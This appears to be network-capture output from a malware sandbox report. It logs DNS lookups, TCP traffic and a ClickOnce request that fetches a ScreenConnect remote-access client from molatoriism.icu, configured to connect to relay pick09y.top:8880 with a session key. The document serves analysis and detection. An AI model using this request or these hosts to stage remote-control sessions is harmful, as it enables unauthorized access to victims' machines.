                                                                                                                                                                              Nov 7, 2024 18:04:50.740865946 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.740891933 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.741214991 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.845278978 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.845288038 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.845341921 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.845515966 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.845521927 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.845566034 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.858279943 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.858288050 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.858352900 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.858387947 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.858428001 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.971575022 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.971642971 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.971643925 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.971652031 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.971688032 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.994762897 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.994807005 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.994833946 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.994848967 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.994875908 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.994889021 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.089229107 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.089265108 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.089312077 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.089323997 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.089348078 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.089369059 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.111627102 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.111658096 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.111713886 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.111728907 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.111756086 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.111778021 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.208178997 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.208226919 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.208271027 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.208291054 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.208316088 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.208332062 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.208564997 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.208617926 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.229418039 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.229513884 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.229574919 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.229624033 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.230204105 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.230257988 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.325968981 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.326047897 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.326128006 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.326176882 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.347721100 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.347762108 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.347821951 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.347829103 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.347847939 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.347871065 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.443779945 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.443836927 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.444000959 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.444050074 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.465295076 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.465353966 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.465568066 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.465616941 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.465856075 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.465900898 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.561441898 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.561502934 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.561518908 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.561530113 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.561556101 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.561574936 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.584074020 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.584141970 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.584163904 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.584170103 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.584198952 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.584216118 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.584531069 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.584582090 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.627198935 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.627310038 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.679078102 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.679158926 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.679660082 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.679707050 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.701823950 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.701916933 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.702095985 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.702155113 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.702660084 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.702723026 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.745122910 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.745182991 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.820132971 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.820141077 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.820187092 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.820219994 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.820235014 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.820265055 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.820287943 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.914597988 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.914663076 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.914756060 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.914791107 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.914805889 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.938602924 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.938618898 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.938694954 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:51.938704967 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:51.938749075 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.055305004 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.055330992 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.055408955 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.055427074 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.055448055 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.055464029 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.150170088 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.150187969 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.150265932 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.150278091 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.150320053 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.173320055 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.173336029 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.173398972 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.173407078 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.173448086 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.268974066 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.269001961 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.269076109 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.269088030 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.269172907 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.291574955 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.291594028 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.291660070 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.291668892 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.291703939 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.386801004 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.386821985 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.386882067 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.386892080 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.386923075 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.386934996 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.409739971 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.409763098 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.409818888 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.409826040 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.409872055 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.526627064 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.526647091 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.526701927 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.526710987 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.526722908 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.526741982 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.527581930 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.527620077 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.527656078 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.527662992 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.527687073 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.527698040 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.676400900 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.676423073 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.676465034 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.676474094 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.676485062 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.676522970 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.677191973 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.677210093 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.677256107 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.677262068 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.677277088 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.677297115 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.794049025 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.794070959 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.794199944 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.794212103 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.794250965 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.795022964 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.795038939 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.795097113 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.795106888 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.797306061 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.857289076 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.857306957 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.857393026 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.857403994 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.857445955 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.912440062 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.912460089 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.912553072 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.912580013 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.913394928 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.923677921 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.923701048 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.923755884 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.923764944 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.923799992 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.923816919 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.029647112 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.029675007 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.029721975 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.029733896 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.029762983 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.029782057 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.030520916 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.030586004 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.030591965 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.030625105 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.030683994 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.031153917 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:56.876944065 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:56.881887913 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:56.881978035 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:58.197540998 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:58.203531981 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:58.472378969 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:58.495964050 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:58.501065969 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:58.771666050 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:58.771948099 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:58.772002935 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:59.767509937 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:59.767566919 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:59.772528887 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:59.772542953 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:59.772551060 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:59.772648096 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:59.772737980 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:59.773030996 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:05:59.777234077 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:05:59.782416105 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:06:59.792860031 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:06:59.797925949 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Nov 7, 2024 18:04:18.185209990 CET5394053192.168.2.51.1.1.1
                                                                                                                                                                              Nov 7, 2024 18:04:18.234338045 CET53539401.1.1.1192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:56.052102089 CET6280853192.168.2.51.1.1.1
                                                                                                                                                                              Nov 7, 2024 18:04:56.815988064 CET53628081.1.1.1192.168.2.5
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Nov 7, 2024 18:04:18.185209990 CET192.168.2.51.1.1.10x73d5Standard query (0)molatoriism.icuA (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 7, 2024 18:04:56.052102089 CET192.168.2.51.1.1.10x304Standard query (0)pick09y.topA (IP address)IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Nov 7, 2024 18:04:18.234338045 CET1.1.1.1192.168.2.50x73d5No error (0)molatoriism.icu172.67.182.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 7, 2024 18:04:18.234338045 CET1.1.1.1192.168.2.50x73d5No error (0)molatoriism.icu104.21.96.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 7, 2024 18:04:24.040889978 CET1.1.1.1192.168.2.50xfb42No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 7, 2024 18:04:24.040889978 CET1.1.1.1192.168.2.50xfb42No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 7, 2024 18:04:25.935441971 CET1.1.1.1192.168.2.50x5418No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Nov 7, 2024 18:04:25.935441971 CET1.1.1.1192.168.2.50x5418No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                              Nov 7, 2024 18:04:56.815988064 CET1.1.1.1192.168.2.50x304No error (0)pick09y.top62.182.85.100A (IP address)IN (0x0001)false
                                                                                                                                                                              • molatoriism.icu
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.549705172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:19 UTC617OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-11-07 17:04:20 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:20 GMT
                                                                                                                                                                              Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                              Content-Length: 147976
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1Q2sy2Nxn666V%2BRQPkz21iSvaEwCNxu83ln6TsKN7drFOoENUN9cPLPV5FV%2FZ9tiyv%2FuFMuLWY93Wb%2FEfB5btSZ7clOZ4RwCg9RZWx9szzfw7iD6L0LL%2Bw67qyE5aNC8oU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee6da89827988-DEN
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19161&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1208&delivery_rate=151250&cwnd=32&unsent_bytes=0&cid=3d1fadce72f7e43d&ts=1105&x=0"
